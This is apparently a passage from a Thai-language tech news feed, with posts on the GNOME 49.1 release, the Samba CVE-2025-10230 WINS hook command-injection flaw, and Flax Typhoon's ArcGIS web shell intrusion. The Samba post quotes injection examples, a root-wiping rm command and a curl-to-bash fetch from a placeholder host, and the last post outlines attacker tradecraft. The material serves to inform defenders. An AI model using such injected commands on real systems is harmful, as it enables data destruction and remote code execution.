    🖥️ “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software การเปลี่ยนแปลงสำคัญ ได้แก่: ⭐ ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น ⭐ รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส ⭐ ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน ⭐ แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software ⭐ แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session ⭐ แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview ⭐ แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง ⭐ แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel ⭐ แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options ใน Nautilus (Files): 🗃️ แก้ไขการ crash จาก callback ภายใน 🗃️ แก้ไขการ paste รูปภาพขนาดใหญ่ 🗃️ ปรับปรุง contrast ของรายการที่ถูก cut 🗃️ แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น 🗃️ แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน ใน Epiphany (GNOME Web): 🌐 ปรับปรุง address bar และ dropdown behavior 🌐 แก้ไขการแสดงผลตัวอักษร non-Latin 🌐 เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google 🌐 แก้ไข caret position หลัง Ctrl+K 🌐 แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส ใน Orca (screen reader): 🔊 เพิ่มการควบคุม caret สำหรับทุก text object 🔊 เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller 🔊 ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences 🔊 เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด ✅ ข้อมูลในข่าว ➡️ GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” ➡️ ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด ➡️ แก้ไข zombie process จาก gnome-session ➡️ Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop ➡️ Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch ➡️ Orca เพิ่ม caret navigation และปรับปรุง voice name presentation ➡️ GNOME Software แก้ไขการแจ้งเตือนอัปเดต ➡️ GNOME Control Center ปรับปรุงหลาย panels ➡️ GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
    9TO5LINUX.COM
    GNOME 49.1 Desktop Released with Various Improvements and Bug Fixes - 9to5Linux
    GNOME 49.1 is now available as the first point release to the latest GNOME 49 desktop environment series with various bug fixes.
    0 ความคิดเห็น 0 การแบ่งปัน 153 มุมมอง 0 รีวิว
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 ความคิดเห็น 0 การแบ่งปัน 150 มุมมอง 0 รีวิว
  • “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ

    กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ

    การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม

    หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN

    สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน

    ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    ข้อมูลในข่าว
    Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน
    ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell
    Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่
    เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย
    ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ
    สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN
    พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets
    สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน
    ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น
    เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    🌪️ “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC) ✅ ข้อมูลในข่าว ➡️ Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน ➡️ ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell ➡️ Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่ ➡️ เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย ➡️ ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ ➡️ สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN ➡️ พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets ➡️ สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ➡️ ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น ➡️ เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC) https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    SECURITYONLINE.INFO
    China-Backed Flax Typhoon APT Maintained Year-Long Access by Turning ArcGIS SOE into Web Shell Backdoor
    ReliaQuest exposed Flax Typhoon for a year-long breach, where the China-backed APT turned a legitimate ArcGIS Java SOE into a web shell and embedded it in backups to ensure persistence.
    0 ความคิดเห็น 0 การแบ่งปัน 128 มุมมอง 0 รีวิว
Pages Boosts